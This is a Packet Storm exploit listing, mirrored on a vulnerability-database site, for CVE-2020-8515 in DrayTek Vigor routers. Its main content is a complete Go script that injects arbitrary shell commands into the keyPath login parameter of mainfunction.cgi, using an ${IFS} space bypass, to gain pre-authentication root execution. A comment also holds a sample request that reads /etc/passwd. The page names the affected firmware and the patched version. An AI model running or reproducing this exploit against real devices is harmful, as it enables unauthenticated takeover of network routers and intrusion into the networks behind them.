Lucene search
K

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

🗓️ 31 Mar 2020 00:00:00Reported by 0xshaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 331 Views

DrayTek Vigor pre-auth remote root RCE, upgrade to v1.5.1 firmwar

Related
Code
`package main  
  
  
/*  
CVE-2020-8515: DrayTek pre-auth remote root RCE  
Mon Mar 30 2020 - 0xsha.io  
Affected:  
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,  
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,  
and 1.4.4_Beta  
You should upgrade as soon as possible to 1.5.1 firmware or later  
This issue has been fixed in Vigor3900/2960/300B v1.5.1.  
read more :  
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html  
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/  
https://thehackernews.com/2020/03/draytek-network-hacking.html  
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/  
exploiting using keyPath  
POST /cgi-bin/mainfunction.cgi HTTP/1.1  
Host: 1.2.3.4  
Content-Length: 89  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a  
*/  
  
import (  
"fmt"  
"io/ioutil"  
"net/http"  
"net/url"  
"os"  
"strings"  
)  
  
func usage() {  
  
fmt.Println("CVE-2020-8515 exploit by @0xsha ")  
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )  
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )  
}  
  
func main() {  
  
  
if len(os.Args) < 3 {  
usage()  
os.Exit(-1)  
}  
  
targetUrl := os.Args[1]  
//cmd := "cat /etc/passwd"  
cmd := os.Args[2]  
  
  
// payload preparation  
vulnerableFile := "/cgi-bin/mainfunction.cgi"  
// specially crafted CMD  
// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a  
payload :=`'  
/bin/sh -c 'CMD'  
'`  
payload = strings.ReplaceAll(payload,"CMD", cmd)  
bypass := strings.ReplaceAll(payload," ", "${IFS}")  
  
//PostForm call url encoder internally  
resp, err := http.PostForm(targetUrl+vulnerableFile ,  
url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} })  
  
if err != nil{  
fmt.Println("error connecting host")  
os.Exit(-1)  
}  
  
  
defer resp.Body.Close()  
body, err := ioutil.ReadAll(resp.Body)  
  
if err != nil{  
fmt.Println("error reading data")  
os.Exit(-1)  
}  
  
fmt.Println(string(body))  
  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2020 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.99993
331